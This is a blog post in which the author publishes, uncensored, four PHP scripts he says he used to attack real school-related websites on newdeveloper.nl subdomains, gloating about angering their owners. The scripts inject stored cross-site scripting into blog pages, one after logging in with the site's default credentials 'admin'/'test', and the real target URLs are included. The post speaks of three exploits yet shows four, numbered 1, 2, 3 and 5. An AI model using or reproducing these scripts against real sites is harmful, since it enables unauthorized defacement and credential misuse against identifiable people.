Exploit codes used against Landstede

Hey G33ks,

So, the storm has settled down between the skrubs from Landstede and me.
So I felt it was safe enough to release the exploit codes πŸ™‚
It were a total of 3 exploits.
All the exploit codes below are 100% how I used them, all URLs, usernames, password etc. are 100% uncensored!
Please note that the exploits *should* have been patched (which gives them 0 reason to complain against me for publishing it) since it’s about 3-4 months ago at the time of writing.
Well, here you go:


Exploit 1 – April 24 2017

Authentication is a luxury?

<?php
/*
 * Exploit by FinlayDaG33k
 * https://aberg.newdeveloper.nl/pages/blog.php 
 */

/*
 * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
 * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
 * As long as you retain this notice you can do whatever you want with this stuff. 
 * If we meet some day, you should buy me a drink.
 * Hugs are mandatory when meeting me!
 * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
 */

$message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec ($ch);

curl_close ($ch);
echo "Exploit send!";
?>

Exploit 2 – May 1 2017

Using username `admin` and password `test` is generally not a good idea on a website facing the whole world…

<?php
/*
 * Exploit by FinlayDaG33k
 * https://aberg.newdeveloper.nl/pages/blog.php 
 */

/*
 * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
 * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
 * As long as you retain this notice you can do whatever you want with this stuff. 
 * If we meet some day, you should buy me a drink.
 * Hugs are mandatory when meeting me!
 * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
 */

 /* Move this comment line to enable the script */
$message = urlencode('<h1>Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

$cookiefile = DIRNAME(__FILE__) . '/cookies.txt';
$f = fopen($cookiefile, "w");
fclose($f);


$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/admin.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"user=admin&password=test");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '-');
curl_setopt($ch, CURLOPT_VERBOSE, true);
$http_headers = array(
                    'Host: aberg.newdeveloper.nl',
                    'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2',
                    'Accept: */*',
                    'Accept-Language: en-us,en;q=0.5',
                    'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
                    'Connection: keep-alive'
                  );
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $http_headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$result = curl_exec ($ch); // Authenticate ourselves!

$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header      = substr($result, 0, $header_size);


curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_exec ($ch);
curl_close ($ch);
*/?>
Exploit send!

Exploit 3 – May 4 2017

This guy trashtalked I wouldn’t be able to exploit his site, well, it worked anyways (hint: he got pissed) πŸ™‚

<?php
/*
 * Exploit by FinlayDaG33k
 * https://cschotman.newdeveloper.nl/pages/blog.php 
 */

/*
 * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
 * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
 * As long as you retain this notice you can do whatever you want with this stuff. 
 * If we meet some day, you should buy me a drink.
 * Hugs are mandatory when meeting me!
 * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
 */


$message = urlencode('This exploit is written on April the 24rd 2017 with ID "FDG-2017-00003".');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

$postdata = urlencode('send_post=HUEHUEHUE&new_title=Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a>&new_post='.$message);


$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"https://cschotman.newdeveloper.nl/blog/new_post.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$postdata);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
curl_close ($ch);

print_r($result);
echo "Exploit send!";
?>

Exploit 5 – May 4 2017 (same as Exploit #1, but against different target)

How was this one even possible?
I already exploited a site using the same mistake…
This one got them really mad btw :mrgreen:

<?php
/*
 * Exploit by FinlayDaG33k
 * https://pmetz.newdeveloper.nl/pages/blog.php 
 */

/*
 * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
 * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
 * As long as you retain this notice you can do whatever you want with this stuff. 
 * If we meet some day, you should buy me a drink.
 * Hugs are mandatory when meeting me!
 * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
 */

$message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL,"https://pmetz.newdeveloper.nl/pages/blog.php ");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec ($ch);

curl_close ($ch);
echo "Exploit send!";
?>

 
 

Well, there ya have it πŸ™‚
If they dare to open their mouths against me again, then we can be sure that they don’t give a damn about security.
But for now…

G33k Out!

Leave a reply